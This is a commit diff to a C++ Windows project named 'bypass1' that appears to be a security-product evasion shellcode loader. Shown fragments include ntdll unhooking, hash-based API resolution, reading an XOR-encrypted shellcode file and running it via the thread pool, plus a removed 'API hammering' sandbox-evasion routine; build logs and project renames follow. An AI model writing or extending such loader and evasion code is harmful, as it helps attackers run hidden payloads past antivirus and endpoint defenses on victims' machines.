Add files via upload

bypass1/bypass1.cpp

@@ -6,7 +6,6 @@
 #include <winternl.h>
 #include <threadpoolapiset.h>
 #include <unordered_map>
-#include <thread>
 
 #pragma comment(lib, "ntdll.lib")
 
@@ -130,19 +129,6 @@ void UnhookNtdll() {
     CloseHandle(hFile);
 }
 
-void APIHammering() {
-    DWORD hashSleep = HashString("Sleep");
-    FARPROC pSleep = ResolveAPI(hashSleep);
-
-    std::thread hammeringThread([pSleep]() {
-        while (true) {
-            reinterpret_cast<void(WINAPI*)(DWORD)>(pSleep)(10);
-        }
-        });
-
-    hammeringThread.detach();
-}
-
 void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
     void* execMemory = VirtualAlloc(
         nullptr,
@@ -201,7 +187,6 @@ int main() {
     const unsigned char key = 0x5A;
 
     UnhookNtdll();
-    APIHammering();
 
     std::ifstream file(filename, std::ios::binary);
     if (!file.is_open()) {
@@ -223,4 +208,4 @@ int main() {
     ExecuteShellcodeWithThreadpool(encryptedShellcode);
 
     return 0;
-}
+}

bypass1/bypass1.vcxproj

@@ -24,7 +24,7 @@
     <ProjectGuid>{39c1481d-cd42-4e6e-8435-35ae9744975e}</ProjectGuid>
     <RootNamespace>bypass1</RootNamespace>
     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
-    <ProjectName>tp</ProjectName>
+    <ProjectName>bypass1</ProjectName>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log

@@ -1,9 +1,5 @@
-c:\users\jason\source\repos\bypass1\bypass1\x64\release\vc143.pdb
 c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.obj
 c:\users\jason\source\repos\bypass1\x64\release\bypass1.exe
-c:\users\jason\source\repos\bypass1\x64\release\bypass1.pdb
-c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.ipdb
-c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.iobj
 c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.command.1.tlog
 c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.items.tlog
 c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.read.1.tlog

bypass1/bypass1/x64/Release/bypass1.log

@@ -1,6 +1,3 @@
-  tp.cpp
-  正在生成代码
-  Previous IPDB not found, fall back to full compilation.
-  All 378 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
-  已完成代码的生成
+  bypass1.cpp
+  LINK : 已指定 /LTCG，但不需要生成代码；从链接命令行中移除 /LTCG 以提高链接器性能
   bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe

bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog

@@ -1 +1 @@
-C:\Users\Jason\source\repos\bypass1\tp.cpp;C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\tp.obj
+C:\Users\Jason\source\repos\bypass1\bypass1.cpp;C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.obj

bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog

@@ -1,3 +1 @@
-^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\BYPASS1\X64\RELEASE\TP.OBJ
-C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.IPDB
-C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.iobj
+^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\BYPASS1\X64\RELEASE\BYPASS1.OBJ